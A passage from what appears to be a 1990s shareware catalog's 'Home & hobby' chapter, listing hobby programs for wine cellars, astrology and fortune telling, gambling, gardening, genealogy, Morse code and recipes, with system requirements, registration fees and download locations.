catalog their video tapes and assist user in + printing catalogs, standard and user customized listings and + labels for the spine and front of the tape. Entries for tape + number, title, rating, start point, star, costar, three user + defined entries and up to 1000 line synopsis as well as + category. User can find any tape by any field or combination. + Can handle up to multiple titles on a single tape, file only + being limited by disk space. Great for the home video buff! + + + Product: The Wine Window + Author: Prospect Software, 309-682-8151 + Version: 1.2 (08-01-95) + Needs: IBM 80386, Windows 3.1 or better. 2024k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $20.00 (add $3.00 for shipping to U.S. + addresses) (add $1.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, fax, BBS, CompuServe, mail support; + 1-month return policy; runtime license; LAN license; site + license; all ASP-wide offers (see page 6); discounts on other + + Chapter 15, "Home & hobby" 525 + + + + products; discounts on upgrades. 6-month free upgrading + allowed. + Look for: availability unknown on BBSs; WWINSTAL.EXE on + CompuServe in CIS:WINSHARE forum LIBrary 19 (or contact userID + 72324,2434 for assistance). + Download size: 1419k (about 106 minutes with a 2400 baud modem) + Description: + A wine cellar management program that allows multiple cellars + or collections. Extensive graphing (ageing, value, soundness, + distributions, etc.). Multiple quality ratings. More than + 2,000 producers pre-loaded. Fast, smart collection entry. Wine + value history. Demonstation cellar included. Written by a + software professional and avid wine collector. + + + 15.5 Fortune telling & astrology + + See also: Religion & philosophy. + + Product: ASTRO + Author: Christopher J. Noyes Software (Christopher J. Noyes), + 718-625-2262 + Version: 2.86 (11-19-94) + Needs: IBM PC, DOS 2.1 or better. 384k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives; Hard disk. + Strongly recommended: EGA monitor; HP DeskJet printer; HP + LaserJet printer; Mouse; Epson printer; EMS memory; math + coprocessor. + Registration fee: $39.95 (Canadian dollars) (add $3.50 (Canadian + dollars) for shipping to U.S. addresses) (add $3.50 (Canadian + dollars) for shipping to Canadian addresses) (add $6.00 + (Canadian dollars) for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of unlimited phone, fax, BBS, CompuServe, + mail support; 6-month return policy; discounts on other + products; discounts on upgrades. Lifetime free upgrading + allowed. + Look for: AST286-?.ZIP on BBSs (multiple files) (call + 718-625-0411 to download it at no charge); AS286?.ZIP on + CompuServe in CIS:NEWAGE forum LIBrary 1 (multiple files) (or + contact userID 71570,3055 for assistance). + Download size: 584k (about 44 minutes with a 2400 baud modem) + Description: + The program for astrological analysis. A fun, full-featured, + easy-to-use astrology program for MS-DOS. Does natal + compatability and transits. Produces interpreted text and + graphics cartwheels. Supports most printers and word + processors. + + Chapter 15, "Home & hobby" 526 + + + + Product: ASTRO For Windows + Author: Christopher J. Noyes Software (Christopher J. Noyes), + 718-625-2262 + Version: 1.08 (11-19-94) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; EGA monitor; + Dual 720k floppy drives; Hard disk; Mouse; XMS memory. + Strongly recommended: VGA monitor; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Plotter; Epson printer; + EMS memory; math coprocessor. + Registration fee: $44.95 (Canadian dollars) (add $3.50 (Canadian + dollars) for shipping to U.S. addresses) (add $3.50 (Canadian + dollars) for shipping to Canadian addresses) (add $6.00 + (Canadian dollars) for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of unlimited phone, fax, BBS, CompuServe, + mail support; 6-month return policy; discounts on other + products; discounts on upgrades. Lifetime free upgrading + allowed. + Look for: ASW108-?.ZIP on BBSs (multiple files) (call + 718-625-0411 to download it at no charge); AW108?.ZIP on + CompuServe in CIS:NEWAGE forum LIBrary 1 (multiple files) (or + contact userID 71570,3055 for assistance). + Download size: 1024k (about 76 minutes with a 2400 baud modem) + Description: + The program for astrological analysis. A fun, full-featured, + easy-to-use astrology program for Windows. Does natal + compatability and transits. Produces interpreted text and + graphics cartwheels. Supports most printers and word + processors. + + + Product: By the Numbers + Author: R.K. West Consulting (Rosemary K. West) + Version: 5.4a (07-28-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Hard disk. + Registration fee: $29.00 (add $3.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of fax, CompuServe, mail support; + bonus utilities; discounts on upgrades. + Look for: NUMB54A.ZIP on BBSs; NUMBER.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + PsL#: 10189 + Download size: 310k (about 23 minutes with a 2400 baud modem) + Description: + Use the philosophy of Numerology to analyze your name & + birthdate for their symbolic meaning and metaphysical + vibrations, giving a complete personality profile. Uses + Pythagorean system, takes name changes into account, analyzes + 10 personality elements, provides forecast. Readings can be + saved, edited, printed. + + Chapter 15, "Home & hobby" 527 + + + + Product: clySmic Lunar Almanack + Moon's phase/place/times. See full description on page 510. + + Product: Crystal Ball + Author: R.K. West Consulting (Rosemary K. West) + Version: 4.0 (05-12-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: CRSTL40.ZIP on BBSs; CRYSTL.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 185k (about 14 minutes with a 2400 baud modem) + Description: + Welcome to the world of the psychic computer! This tongue-in- + cheek program makes predictions and answers questions with a + sometimes enigmatic style reminiscent of the ancient Greek + oracles. You select the subject matter for predictions of + personal interest. This could explain where those crazy tabloid + headlines come from! + + + Product: Fortune Teller + Author: R.K. West Consulting (Rosemary K. West) + Version: 4.4a (09-30-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Hard disk. + Registration fee: $29.00 (add $3.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of fax, CompuServe, mail support; + bonus utilities; discounts on other products; discounts on + upgrades. + Look for: FORT44A.ZIP on BBSs; FORTUN.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + PsL#: 10249 + Download size: 290k (about 22 minutes with a 2400 baud modem) + Description: + A potpourri of fortune telling techniques includes three + playing card methods, dice, Numerology, Runes, and "Instant + Oracle". A history and explanation of each method appears in + the documentation. Also included is an ESP test. + + + Product: Geomancy + Ancient system of divination with black magic. See full + description on page 580. + + Chapter 15, "Home & hobby" 528 + + + + Product: I Ching Empower Tool + Author: Roger Norton Consulting, 618-783-3932 + Version: 1.5 (11-28-95) + Needs: IBM 80386, Windows 3.1 or better. Program can run safely + on a system with no hard disk and only one floppy disk drive; + VGA monitor; Hard disk; Mouse. + Registration fee: $30.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime fax, CompuServe, newsletter, mail + support; 1-month return policy; bonus utilities; bonus data; + discounts on upgrades. 3-month free upgrading allowed. + Certification as Empower Consultant with Pro version. + Look for: CHNG15.ZIP on BBSs; ICHING.ZIP on CompuServe in + CIS:PCFUN forum LIBrary 12 (or contact userID 75363,1523 for + assistance). + SWREG#: 5719 + PsL#: 14045 + Download size: 1300k (about 97 minutes with a 2400 baud modem) + Description: + New interpretation of the 5,000-year-old I Ching gives you + answers to your most important, intimate questions by bringing + your reasoning, conscious mind in contact with your intuitive + subconscious. Gives a 360-degree view of your situation and + helps you develop greater creativity and flexibility in career, + relationships, conflict resolution, strategy, Self and spirit. + Great brainstorming tool. Highly graphic. Print and/or file + your readings. Two Help files, including full text of I Ching. + + + Product: KBBLH120.ZIP + Kabbalah: The Prophecy of the Chariot. See full description on + page 581. + + Product: Lunar Taskbar Almanack + Lunar Taskbar Almanack in Icon Form. See full description on + page 121. + + Product: Mayan Calendar + Author: R.K. West Consulting (Rosemary K. West) + Version: 3.8a (12-27-94) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: MAYAN38.ZIP on BBSs; MAYAN.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 185k (about 14 minutes with a 2400 baud modem) + Description: + Uses the astronomical knowledge of the ancient Mayans to + convert a modern calendar date to its Mayan equivalent, and + then gives the Mayan astrological interpretation. Also uses + + Chapter 15, "Home & hobby" 529 + + + + Julian period dates and will calculate from Mayan to modern + date. Has chart of Mayan and Aztec day and month names. Easy- + to-understand documentation and history of the Mayan calendar + included on disk. Norman Donaldson's excellent research is + explained in detail. + + + Product: NUMERO UNO + Author: Christopher J. Noyes Software (Christopher J. Noyes), + 718-625-2262 + Version: 1.05 (11-19-94) + Needs: IBM PC, DOS 2.1 or better. 384k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives; Hard disk. + Strongly recommended: EGA monitor; HP DeskJet printer; HP + LaserJet printer; Mouse; Epson printer; EMS memory; math + coprocessor. + Registration fee: $39.95 (Canadian dollars) (add $3.50 (Canadian + dollars) for shipping to U.S. addresses) (add $3.50 (Canadian + dollars) for shipping to Canadian addresses) (add $6.00 + (Canadian dollars) for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of unlimited phone, fax, BBS, CompuServe, + mail support; 6-month return policy; discounts on other + products; discounts on upgrades. Lifetime free upgrading + allowed. + Look for: NUM105-?.ZIP on BBSs (multiple files) (call + 718-625-0411 to download it at no charge); NU105?.ZIP on + CompuServe in CIS:NEWAGE forum LIBrary 1 (multiple files) (or + contact userID 71570,3055 for assistance). + Download size: 584k (about 44 minutes with a 2400 baud modem) + Description: + The program for numerological analysis. A fun, full-featured, + easy-to-use numerology program for MS-DOS. Does analysis of + birth date, birth name and current name. Produces interpreted + text reports, data report, and name transits and calendars. + Supports most printers and word processors. + + Chapter 15, "Home & hobby" 530 + + + + Product: Personal Tarot + Author: R.K. West Consulting (Rosemary K. West) + Version: 3.1 (10-04-94) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Dual 720k floppy + drives. + Strongly recommended: Hard disk. + Registration fee: $29.00 (add $3.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of fax, CompuServe, mail support; + discounts on upgrades. + Look for: TAROT31.ZIP on BBSs; TAROT.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + PsL#: 10220 + Download size: 205k (about 15 minutes with a 2400 baud modem) + Description: + Tarot cards have been used around the world throughout history + for fun and fortune. Now you can enjoy professional quality + Tarot readings on your PC! Automates shuffling and dealing, + builds a 10-card layout, and displays card descriptions and + meanings. You choose from different methods of shuffling and + layout. You can edit card interpretations and add your own + comments. Readings can be saved, edited, printed. No graphics. + + + Product: Quick Fortunes + Author: R.K. West Consulting (Rosemary K. West) + Version: 1.1 (06-15-96) + Needs: IBM 80386, Windows 3.1 or better. 640k RAM. + Registration fee: $10.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: 3 months of unlimited fax, CompuServe, + mail support. Lifetime free upgrading allowed. Remove time + limiting. + Look for: QFORT11.ZIP on BBSs; QFORTUNE.ZIP on CompuServe in + CIS:RKWEST forum LIBrary 9 (or contact userID 74774,403 for + assistance). + SWREG#: 11697 + PsL#: 14672 + Download size: 1k (about one minute with a 2400 baud modem) + Description: + Have fun with 4 traditional fortune telling techniques: one- + card, three-card, dice and dominoes. Short readings can be + printed for reference, and make great party favors. + + + Product: The Richard Webster System + Read personalities like professional psychic. See full + description on page 555. + + Chapter 15, "Home & hobby" 531 + + + + Product: Wynter Stone's I Ching + Author: R.K. West Consulting (Rosemary K. West) + Version: 1.2 (02-17-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Dual 720k floppy + drives. + Strongly recommended: Hard disk. + Registration fee: $29.00 (add $3.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of fax, CompuServe, mail support; + discounts on upgrades. + Look for: ICHNG12.ZIP on BBSs; ICHING.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + SWREG#: 9198 + PsL#: 10756 + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + The I Ching is an ancient Chinese book used for both fortune + telling and philosophical insight. Toss coins or sticks to + create a pattern of 6 lines, forming a hexagram for + interpretation. You can edit the text for each hexagram and add + your own comments. Readings can be saved, edited, printed. + + + Product: Wynter Stone's Quick Guide + Author: R.K. West Consulting (Rosemary K. West) + Version: 1.6 (11-17-94) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: WGUID16.ZIP on BBSs; WGUIDE.ZIP on CompuServe in + CIS:PCVENK forum LIBrary 9 (or contact userID 74774,403 for + assistance). + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + If you've ever wondered what "New Age" really stands for, this + could help. It's an on-disk mini-encyclopedia of subjects + related to mystical experiences of various kinds. Both DOS and + Windows versions are included. Freeware. + + Chapter 15, "Home & hobby" 532 + + + + Product: Your ESP Test + Author: R.K. West Consulting (Rosemary K. West) + Version: 1.5 (05-19-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: EGA monitor; Hard disk. + Registration fee: $0.00 + Registration benefits: + Look for: ESP15.ZIP on BBSs; ESP.ZIP on CompuServe in CIS:PCVENK + forum LIBrary 9 (or contact userID 74774,403 for assistance). + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + Find out if you have psyhcic powers, using three standard tests + to see if you have ESP (extra-sensory perception) potential. + Try precognition (seeing the future), clairvoyance (knowing + things unseen), or telekinesis (moving objects iwth your mind). + Lots of fun! + + + 15.6 Gambling + + See also: Games, Casino games; Home & hobby, Sports, + Handicapping; Home & hobby, Sports, Betting pools. + + Product: NFL Forecaster for DOS + Predicts winners & spreads of NFL games. See full description + on page 572. + + Product: NFL Forecaster for Windows + Predicts winners & spreads of NFL games. See full description + on page 573. + + Product: RoboCrap.v94 + Crap table simulator. See full description on page 602. + + Product: Thoroughbred Handicapper Pro + Complete thoroughbred handicapping system. See full + description on page 565. + + Product: TURF.v93 + Thoroughbred handicapping system. See full description on + page 565. + + Product: ULTIMATE BACCARAT + Interactive animated Baccarat simulation. See full description + on page 603. + + Product: ULTIMATE BLACKJACK + Interactive animated blackjack simulation. See full + description on page 603. + + Chapter 15, "Home & hobby" 533 + + + + Product: Windows Lotto Pro + Picks and wheels your Lottery numbers. See full description on + page 548. + + + 15.7 Gardening + + Product: Grow'Em + Author: Paul Postuma, 506-849-7087 + Version: 3.0 (03-01-95) + Needs: IBM PC, DOS 3.1 or better. 640k RAM; VGA monitor; Hard + disk. + Strongly recommended: EMS memory. + Registration fee: $19.95 (Canadian dollars) (add $2.00 (Canadian + dollars) for shipping to U.S. addresses) (add $2.00 (Canadian + dollars) for shipping to Canadian addresses) (add $3.00 + (Canadian dollars) for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited CompuServe, mail + support; bonus data; bonus graphics; all ASP-wide offers (see + page 6); discounts on upgrades. 3-month free upgrading allowed. + Look for: availability unknown on BBSs; GROW3V.EXE on CompuServe + in CIS:GARDENING forum LIBrary 11 (or contact userID 74471,1240 + for assistance). + SWREG#: 5335 + PsL#: 14161 + Download size: 868k (about 65 minutes with a 2400 baud modem) + Description: + Definitive program on propagating plants from seed, cuttings, + by layering, etc. Features over 200 species, most propagating + techniques in depth, and detailed info on growth media, + composting, cold frames, lighting, etc. Easy-to-use resource, + illustrated with sketches and digitized images, runs well under + DOS or Windows. Mouse or keyboard-driven + + + 15.8 Genealogy + + Product: Brother's Keeper + Author: John Steed + Version: 5.1 (02-01-93) + Needs: IBM PC, DOS 3.1 or better. 512k RAM; Hard disk. + Registration fee: $45.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime phone, fax, BBS, CompuServe, GEnie, + mail support; 12-month return policy; discounts on upgrades. + Lifetime free upgrading allowed. 1 free update disk(s) sent + out. + Look for: BK5*.* on BBSs (multiple files) (call 616-364-1127 to + download it at no charge); BK5*.* on CompuServe in CIS:ROOTS + forum LIBrary 3 (multiple files) (or contact userID 75745,1371 + + Chapter 15, "Home & hobby" 534 + + + + for assistance); BK5*.* on GEnie in GENEALOGY forum LIBrary 8 + (multiple files) (or contact userID J.STEED1 for assistance). + Download size: 1500k (about 112 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, Shareware Industry Awards. + Description: + A full featured genealogy program which can store names, dates, + locations, and other information for up to 1,000,000 people. It + prints all the standard charts and reports and a few unique + ones. Reports include ancestor or pedigree charts, descendant + reports with relationships, graphic descendant tree, family + group sheets, alphabetical name lists, birthday lists, custom + designed reports, ahnentafel lists, graphic box charts, and a + descendant register report. Includes gedcom. + + + Product: CHRONOS + Interactive historical timelines. See full description on + page 468. + + Product: EZ-Tree + Author: MicroFox Company (Jim Hass), 216-659-9489 + Version: 2.31 (01-01-96) + Needs: IBM PC, DOS 2.0 or better. 512k RAM. + Strongly recommended: Hard disk; Mouse. + Registration fee: $30.00 (add $2.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, BBS, CompuServe, mail support; 1-month limited return + policy; LAN license; site license; bonus utilities; all ASP- + wide offers (see page 6); disks of other shareware; discounts + on other products. 1-month free upgrading allowed. + Look for: EZT231.ZIP on BBSs (call 216-661-9065 to download it at + no charge); EZT231.ZIP on CompuServe in CIS:ROOTS forum LIBrary + 3 (or contact userID 73057,3113 for assistance); EZT231.ZIP on + GEnie in GENEALOGY forum LIBrary 0. + Download size: 211k (about 16 minutes with a 2400 baud modem) + Description: + A genealogy program that lets you keep track your family tree. + It can link family trees together and report on them in many + different formats. Can handle 16 marriages per person and 32 + children per couple, with an almost unlimited number of people + thanks to the new linking ability. By far, this is the easiest + genealogy program to use. It presents the family in an on- + screen tree structure. + + + Product: Family Calendar for Windows + Prints family oriented, quality wall calendar. See full + description on page 120. + + Chapter 15, "Home & hobby" 535 + + + + Product: OMNIDay + Daily diary program for up to 10 users. See full description + on page 147. + + 15.8.1 Pedigrees + + Product: Kith and Kin + Author: SpanSoft (Nick J Hunter), +44-(0)1383-510597 + Version: 3.03 (02-20-96) + Needs: IBM AT (80286), Windows 3.1 or better. VGA monitor; Hard + disk; Mouse. + Registration fee: L-28.00 (add L-2.00 for shipping to U.S. + addresses) (add L-2.00 for shipping to Canadian addresses) (add + L-2.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; bonus + utilities; bonus data; discounts on other products; discounts + on upgrades. + Look for: KK303.ZIP on BBSs (call +44-(0)1242-232623 to download + it at no charge); KITKIN.ZIP on CompuServe in CIS:ROOTS forum + LIBrary 2 (or contact userID 100101,1155 for assistance). + SWREG#: 2537 + PsL#: 11172 + Download size: 500k (about 37 minutes with a 2400 baud modem) + Description: + Stores and documents family trees which will appeal to + genealogists and family historians. Features an easy to use + graphical interface and powerful multi-level editing tools. The + program supports date and place of births, marriages and deaths + as well as mutiple marriages and aliases for each person. + Pictures, diagrams, sounds, etc may be linked to a person or + family via Windows OLE. Imports and exports PAF GEDCOM files. + Prints drop-line trees and detail reports. + + Chapter 15, "Home & hobby" 536 + + + + Product: TreeDraw + Author: SpanSoft (Nick J Hunter), +44-(0)1383-510597 + Version: 1.11 (09-04-95) + Needs: IBM AT (80286), Windows 3.1 or better. VGA monitor; Hard + disk; Mouse. + Strongly recommended: HP DeskJet printer; HP LaserJet printer; + Epson printer. Kith and Kin or other PAF GEDCOM comaptible + genealogy database. + Registration fee: L-20.00 (add L-2.00 for shipping to U.S. + addresses) (add L-2.00 for shipping to Canadian addresses) (add + L-2.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, CompuServe, mail support; bonus + graphics; all ASP-wide offers (see page 6); discounts on other + products; discounts on upgrades. + Look for: TRD111.ZIP on BBSs (call +44-(0)1242-232623 to download + it at no charge); TREDRW.ZIP on CompuServe in CIS:ROOTS forum + LIBrary 2 (or contact userID 100101,1155 for assistance). + SWREG#: 3200 + PsL#: 11528 + Download size: 337k (about 25 minutes with a 2400 baud modem) + Description: + A specialist graphics editor for creating high quality + genealogical drop-line charts. Descendant and ancestral trees + may be imported direct from Kith and Kin tree files or from PAF + GEDCOM files created by other genealogy programs. Converts + these trees into easily edited picture elements which can then + be re-formatted and re-arranged before storing and printing. It + is now easy to produce perfectly laid out charts and + incorporate pictures, diagrams and other simple graphics. + + + 15.9 Ham radio + + Product: NuMorse Morse Code trainer + Author: A. Lacy + Version: 1.30e (07-27-95) + Needs: IBM 80386, Windows 3.1 or better. 4000k RAM; VGA monitor; + Hard disk; Mouse. + Strongly recommended: SVGA monitor; sound card. + Registration fee: $29.00 + Registration benefits: Full program functionality; lifetime + unlimited CompuServe, mail support; all ASP-wide offers (see + page 6). Lifetime free upgrading allowed. + Look for: NM130E.ZIP on BBSs; NUMORS.ZIP on CompuServe in + CIS:HAMNET forum LIBrary 7 (or contact userID 100030,157 for + assistance). + SWREG#: 1721 + Download size: 900k (about 67 minutes with a 2400 baud modem) + Description: + Morse code trainer. Code via sound card/PC speaker/Semaphore + window/code oscillator. Code source is random generator/text + files/QSO generator/keyboard. Set code speed/timing or let + program do it for you. Select characters to learn. Farnsworth + + Chapter 15, "Home & hobby" 537 + + + + code and prosigns supported. FCC tests and convincing QSO's + generated. Drill modes-monitor progress/correct errors. Uses + voice phonetics, with a British accent! Reviewed in several + mags. including QST/CQ/Practical Wireless/Amateur Radio. + + + Product: PC-ECAP + Linear circuit analysis program with graphics. See full + description on page 344. + + Product: RADIOSIM + Simulation of a radio-electric link. See full description on + page 344. + + + 15.10 Health + + Product: ShotZ + Author: Unicorn Software Limited (Charles P. Schell IV), + 816-429-3558 + Version: 3.00 (01-15-92) + Needs: IBM PC, DOS 2.1 or better. 330k RAM; CGA monitor; + Hercules monitor; Dual 720k floppy drives. IBM Graphics + printer. + Strongly recommended: Hard disk; HP LaserJet printer; Mouse. + Registration fee: $5.00 + Registration benefits: 3 months of unlimited phone, fax, BBS, + CompuServe, mail support; all ASP-wide offers (see page 6); + disks of other shareware; discounts on other products. + Lifetime free upgrading allowed. 99 free update disk(s) sent + out. + Look for: SHOTZ300.ZIP on BBSs (call 317-784-2147 to download it + at no charge); SHOTZ.ZIP on CompuServe in CIS:PCAPP forum + LIBrary 7 (or contact userID 70272,3317 for assistance). + Download size: 233k (about 18 minutes with a 2400 baud modem) + Description: + Originally designed to handle immunization tracking for a USAF + Reserve unit, this program has been "adopted" by many non- + profit organizations and families as an easy way to track + immunization due dates. Handles up to 10,000 people for 12 + different immunizations. User can change immunization tracked + and dues dates as the need arises. Prints or allows viewings + of lists and produces letters when shot is overdue. All + proceeds from this program go to the American Red Cross. + + + 15.10.1 Food/dietary/kitchen + + Product: Cellar Master for Windows + Wine Cellar Manager for Windows. See full description on + page 516. + + Chapter 15, "Home & hobby" 538 + + + + Product: From Scratch recipe processor + Author: Desktop Solutions (Frank Imburgio), 516-493-3422 + Version: 3.04 (11-01-94) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: $34.95 (Canadian dollars) (add $4.00 (Canadian + dollars) for shipping to U.S. addresses) (add $6.00 (Canadian + dollars) for shipping to Canadian addresses) (add $6.00 + (Canadian dollars) for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited fax, CompuServe, mail support; lifetime + return policy; bonus data; all ASP-wide offers (see page 6). + Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; FS*.ZIP on CompuServe in + CIS:COOKS forum LIBrary 0 (multiple files) (or contact userID + 74676,3314 for assistance). + SWREG#: 2554 + PsL#: 10678 + Download size: 1k (about one minute with a 2400 baud modem) + Description: + Easy to use Windows recipe program! Unlimited number of + ingredients per recipe, and any number of recipes. + Sophisticated printing with combination of fonts. Complete + search capability, yield conversion, fractions, shopping list, + and more. Calculates nutrition information from a 4400 item + USDA database. Prints on 3X5 cards. Converts from Meal Master, + Compu-chef, and Micro Kitchen recipes, as well as allows + swapping recipes with other From Scratch users. Stores data in + dBase IV compatible files. + + + Product: Heart Smart + Author: Henning Associates (Michael R. Henning), 804-295-0554 + Version: 4.01 (04-26-96) + Needs: IBM AT (80286), Windows 3.1 or better. + Strongly recommended: VGA monitor; Hard disk. + Registration fee: $19.95 (add $2.95 for shipping to U.S. + addresses) (add $2.95 for shipping to Canadian addresses) (add + $3.95 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited tollfree 800# phone, + mail support; lifetime return policy; bonus data; all ASP-wide + offers (see page 6); discounts on upgrades. Lifetime free + upgrading allowed. + Look for: availability unknown on BBSs; HSMART40.ZIP on + CompuServe in CIS:WINSHAR forum LIBrary 0 (or contact userID + 72176,2507 for assistance). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + A Windows based nutrition program that helps you keep track of + calories, carbohydrates, fat, protein, sodium, and cholesterol + in your diet. There is a 900 item modifiable food list in the + program and the capability to preview and print your weekly + menus. Many new features include drag and drop, RDA values, + menu display, component counts, weight graph, and more. + + Chapter 15, "Home & hobby" 539 + + + + Product: Managing Your Food + Tracks food cost, nutrition, and inventory. See full + description on page 293. + + Product: MicroCook + Author: NORSKi Software, 414-632-9815 + Version: 1.96 (02-01-96) + Needs: IBM PC, DOS 3.2 or better. 512k RAM; CGA monitor; Dual + 720k floppy drives. + Strongly recommended: VGA monitor; Hard disk; HP DeskJet + printer; HP LaserJet printer; Mouse; Epson printer; EMS memory; + XMS memory. + Registration fee: $20.00 (add $2.00 for shipping to Canadian + addresses) (add $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, CompuServe, + GEnie, mail support; 3-month return policy; bonus utilities; + bonus data; all ASP-wide offers (see page 6); discounts on + upgrades. 24-month free upgrading allowed. + Look for: MCOOK196.ZIP on BBSs (call 414-878-2106 to download it + at no charge); MCOOKN.ZIP on CompuServe in CIS:COOKS forum + LIBrary 0 (or contact userID 72713,1667 for assistance); + MCOOK196.ZIP on GEnie in IBMPC forum LIBrary 15 (or contact + userID NORSKI for assistance). + SWREG#: 3595 + PsL#: 14025 + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + A recipe collection management program for DOS with easy to use + editor, pull-down menus, and with full mouse support. Number of + recipes and databases only limited by hard disk space. Import + and Export recipes in ASCII format, and will Import ASCII + recipes from Meal-Master, MasterCook and Edna's. Powerful + searches. Support XMS and EMS for overlays. Duplicate recipe + checking. Print to any printer, or to disk file. Recipes + included. Works great in Windows too! + + + Product: Program for a Small Planet + Author: Strat-Tech, Inc., 800-783-9544 + Version: 6.0 (10-26-93) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; Dual 720k floppy drives. + Strongly recommended: CGA monitor; Hercules monitor; Hard disk. + Registration fee: $26.00 (add $6.00 for shipping to Canadian + addresses) (add $6.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of tollfree 800# phone, CompuServe, mail support; + 1-month return policy; bonus data; all ASP-wide offers (see + + Chapter 15, "Home & hobby" 540 + + + + page 6); disks of other shareware; discounts on other products. + 6-month free upgrading allowed. + Look for: FOODSM60.ZIP on BBSs; FOODSM.EXE on CompuServe in + CIS:GOODHEALTH forum LIBrary 10 (or contact userID 72317,2332 + for assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Editor's note: The author claims to accept local-currency checks + from non-U.S. customers. + Description: + Finds healthy and delicious food combinations. We combine + foods based on "Diet for A Small Planet" by Frances Moore + Lappe. We include calorie, sodium, cholesteral, fat, fiber and + protein counts. Has computerized pantry and graphics. Develops + combinations naturally the way traditional food dishes evolve. + + + Product: Windows Gourmet + Author: Dovcom, 801-221-4527 + Version: 1.2 (01-01-95) + Needs: IBM 80386, Windows 3.1 or better. 1000k RAM; EGA monitor; + Hard disk. + Strongly recommended: VGA monitor. + Registration fee: $19.95 (add $3.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, CompuServe, mail support; + 3-month return policy; all ASP-wide offers (see page 6); + discounts on other products; discounts on upgrades; + registration commissions. 3-month free upgrading allowed. + Look for: WNGOUR12.ZIP on BBSs (call 801-224-4031 to download it + at no charge); WNGOUR.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 19 (or contact userID 74552,1027 for assistance). + SWREG#: 3167 + PsL#: 11406 + Download size: 339k (about 25 minutes with a 2400 baud modem) + Description: + A powerful, easy to use recipe database and meal planning + system. Familiar "recipe card" display and simple interface + allows for quick entry and indexing of hundreds of 